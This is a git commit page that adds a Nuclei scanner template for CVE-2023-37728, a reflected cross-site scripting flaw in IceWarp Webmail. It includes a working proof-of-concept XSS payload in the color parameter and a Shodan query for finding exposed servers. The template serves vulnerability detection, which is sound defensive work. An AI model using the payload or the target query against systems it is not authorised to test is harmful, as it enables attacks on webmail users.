Merge pull request #8401 from projectdiscovery/CVE-2023-37728

Create CVE-2023-37728.yaml
patch-1
pussycat0x 2023-10-17 11:35:48 +05:30 committed by GitHub
commit 2bca87e397
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: CVE-2023-37728
info:
name: IceWarp Webmail Server - Cross-Site Scripting
author: technicaljunkie
severity: medium
description: |
IceWarp Webmail Server contains a cross-site scripting vulnerability in the /webmail/ color parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
- https://medium.com/@ayush29/cve-2023-37728-6dfb7586311
classification:
cvss-metrics: CCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-37728
cwe-id: CWE-79
metadata:
shodan-query: title:"icewarp"
verified: true
max-request: 1
tags: cve,cve2023,xss,icewarp
http:
- method: GET
path:
- '{{BaseURL}}/webmail/?color=%22%3E%3Cimg%20src%20onerror=%22alert(document.domain)%22%3E%3C%22%27'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '><img src onerror="alert(document.domain)"><'
- 'IceWarp'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200